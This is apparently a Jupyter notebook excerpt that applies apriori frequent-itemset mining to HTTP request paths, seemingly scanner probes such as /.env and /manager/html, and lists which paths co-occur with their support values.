from mlxtend.frequent_patterns import apriori

freq_itemsets = apriori(df, use_colnames=True, min_support=0.005)

freq_itemsets

      support                                           itemsets
0    0.500538                                                (/)
1    0.005382                                            (/.env)
2    0.034446                         (/CDGServer3/SystemConfig)
3    0.011841                        (/Users/authenticatebyname)
4    0.006459                      (/_ignition/execute-solution)
..        ...                                                ...
121  0.005382                        (/, /manager/html, /login/)
122  0.020452       (/, /manager/html, /wp-admin/admin-ajax.php)
123  0.005382  (/manager/html, /CDGServer3/SystemConfig, /ind...
124  0.005382                (/manager/html, /login, /index.php)
125  0.005382  (/manager/html, /wp-admin/admin-ajax.php, /ind...

[126 rows x 2 columns]

In [6]:
freq_itemsets['length'] = freq_itemsets['itemsets'].apply(lambda x: len(x))
freq_itemsets

      support                                           itemsets  length
0    0.500538                                                (/)       1
1    0.005382                                            (/.env)       1
2    0.034446                         (/CDGServer3/SystemConfig)       1
3    0.011841                        (/Users/authenticatebyname)       1
4    0.006459                      (/_ignition/execute-solution)       1
..        ...                                                ...     ...
121  0.005382                        (/, /manager/html, /login/)       3
122  0.020452       (/, /manager/html, /wp-admin/admin-ajax.php)       3
123  0.005382  (/manager/html, /CDGServer3/SystemConfig, /ind...       3
124  0.005382                (/manager/html, /login, /index.php)       3
125  0.005382  (/manager/html, /wp-admin/admin-ajax.php, /ind...       3

[126 rows x 3 columns]

In [7]:
freq_itemsets[freq_itemsets["length"] >= 3]

      support                                           itemsets  length
114  0.005382          (/, /CDGServer3/SystemConfig, /index.php)       3
115  0.012917       (/, /manager/html, /CDGServer3/SystemConfig)       3
116  0.006459                         (/, /_session, /index.php)       3
117  0.005382                            (/, /login, /index.php)       3
118  0.033369                     (/, /manager/html, /index.php)       3
119  0.011841          (/, /wp-admin/admin-ajax.php, /index.php)       3
120  0.008611                         (/, /login, /manager/html)       3
121  0.005382                        (/, /manager/html, /login/)       3
122  0.020452       (/, /manager/html, /wp-admin/admin-ajax.php)       3
123  0.005382  (/manager/html, /CDGServer3/SystemConfig, /ind...       3
124  0.005382                (/manager/html, /login, /index.php)       3
125  0.005382  (/manager/html, /wp-admin/admin-ajax.php, /ind...       3